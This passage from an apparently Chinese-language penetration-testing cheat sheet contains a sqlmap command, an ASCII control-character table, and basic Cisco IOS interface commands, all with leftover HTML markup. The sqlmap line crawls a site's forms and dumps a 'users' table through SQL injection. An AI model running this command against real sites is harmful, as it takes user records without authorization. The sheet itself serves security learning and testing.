<\/span><\/span>sqlmap -o -u "http:\/\/meh\/vuln-form"<\/span> --forms -D database-name -T users --dump
<\/span><\/span><\/code><\/pre>15. ASCII表速查<\/h2>



ASCII字符<\/th>
描述<\/th>
<\/tr>
<\/thead>


x00<\/td>
Null Byte 空字节<\/td>
<\/tr>

x08<\/td>
BS 退格<\/td>
<\/tr>

x09<\/td>
TAB 水平制表符<\/td>
<\/tr>

x0a<\/td>
LF 换行<\/td>
<\/tr>

x0d<\/td>
CR 回车<\/td>
<\/tr>

x20<\/td>
SPC 空格<\/td>
<\/tr>

...<\/td>
...<\/td>
<\/tr>
<\/tbody>
<\/table>
16. Cisco IOS命令<\/h2>
enable  # 进入使能模式<\/span>
<\/span><\/span>conf t  # 配置终端<\/span>
<\/span><\/span>(<\/span>config)<\/span># interface fa0\/0  # 配置FastEthernet 0\/0<\/span>
<\/span><\/span>(<\/span>config-if)<\/span># ip addr 0.0.0.0 255.255.255.255  # 添加IP到fa0\/0<\/span>
<\/span><\/span>(<\/span>config-if)<\/span># line vty <\/span>
<\/span><\/span><\/code><\/pre>